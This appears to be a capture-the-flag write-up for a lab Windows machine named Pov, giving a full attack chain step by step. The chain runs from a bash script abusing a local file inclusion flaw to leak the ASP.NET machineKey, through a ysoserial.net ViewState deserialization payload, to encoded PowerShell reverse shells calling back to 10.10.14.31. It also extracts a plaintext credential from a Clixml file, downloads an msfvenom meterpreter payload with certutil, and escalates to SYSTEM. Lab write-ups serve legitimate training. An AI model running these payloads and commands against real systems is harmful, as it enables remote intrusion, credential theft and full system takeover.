👁️‍🗨️

Pov

 
only port 80 open
 
notion image
notion image
dirsearch, but no accessible found
notion image
echo "10.129.29.23 pov.htb" >> /etc/hosts
sudo gobuster vhost -u http://pov.htb -w /usr/share/wordlists/dnsmap.txt
found dev.pov.htb subdomain with status 302
notion image
notion image
./dirsearch.py -u http://dev.pov.htb/portfolio/ -x 404,302,403
notion image
by pressing “download”
notion image
notion image
as we can see there is LFI on the download endpoint.
write a script for enumerate File
#!/bin/bash lfi() { local path="$1" local url="http://dev.pov.htb/portfolio/" local data="__EVENTTARGET=download&__EVENTARGUMENT=&__VIEWSTATE=oZdOFgVMnMUK%2FYsKb5EIbu8K5FHpcUxxiZo4DRwjqKXyaBZlr5C2B1qTDis2i3ay5jRdEkHIpxK%2FDtizrUyeFYsgG2I%3D&__VIEWSTATEGENERATOR=8E0F0FA3&__EVENTVALIDATION=q9%2BtrU8Llel1HIV8dNCMQjWweRAVxWvJLVMAhov2wealiJz5v86vse9faPve%2B2Ujm%2BGxnHiSCVy56Gzrmw%2BEzjrEGa%2BQ6qlezJahDpD%2BDppQ%2BivmcgEiaonMs2JLzDyETmEABw%3D%3D&file=$path" if response=$(curl -s -k -X POST --data-binary "$data" "$url"); then if [ "$(echo "$response" | grep -c "Error 404: Not Found")" -eq 0 ]; then echo -e "\e[32m$response\e[0m" else echo -e "\e[31m$path not found.\e[0m" fi else echo -e "\e[31mLFI Error : $(curl -s "$url" --data-urlencode "$params" -o /dev/null -w '%{http_code}')\e[0m" fi } main() { while true; do read -r -p $'\e[34m[+] file >> \e[0m' path lfi "$path" done } if [ "${BASH_SOURCE[0]}" == "${0}" ]; then main fi
found web.config by enumeration
notion image
it gives out a decryption key and validation
<machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
by googling..
open windows, try this exploit
git clone https://github.com/NHPT/ysoserial.net.git
generate a powershell reverse shell in file rev.ps1
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.31',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
CODE=$(cat rev.ps1 | iconv -t utf-16le | base64 -w 0; echo); echo "powershell -enc $CODE"
encode it by base64
powershell -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA0AC4AMwAxACcALAA2ADYANgA2ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACcAPgAgACcAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkACgA=
 
.\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "powershell -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA0AC4AMwAxACcALAA2ADYANgA2ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACcAPgAgACcAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkACgA=" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
notion image
got the generated payload
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
change the __VIEWSTATE in bp
notion image
get the initial shell
PS C:\Users> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======== SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
notion image
get a credential by searching in documents
$credential = Import-Clixml -Path "c:\users\sfitz\documents\connection.xml" echo ($credential.UserName + ":" + $credential.GetNetworkCredential().Password)
alaading:f8gQ8fynP44ek1m3
$username = 'alaading' $password = 'f8gQ8fynP44ek1m3' $securePassword = ConvertTo-SecureString $password -AsPlainText -Force $credential = New-Object System.Management.Automation.PSCredential ($username, $securePassword) Invoke-Command -ComputerName localhost -Credential $credential -ScriptBlock {powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMwAxACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==}
notion image
get the shell of user alaading
PS C:\Users\alaading\Desktop> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======== SeDebugPrivilege Debug programs Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeDebugPrivilege is disabled
runascs:
create a msfvenom revshell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.31 LPORT=7777 -f exe -o reverse.exe
certutil -urlcache -f http://10.10.14.31:8000/reverse.exe reverse.exe certutil -urlcache -f http://10.10.14.31:8000/RunasCs.exe RunasCs.exe
exploit by msfconsole ..
.\RunasCs.exe alaading f8gQ8fynP44ek1m3 "C:\\Users\\alaading\\Desktop\\reverse.exe"
notion image
ps
notion image
PID of winlogon is 540
notion image
got the root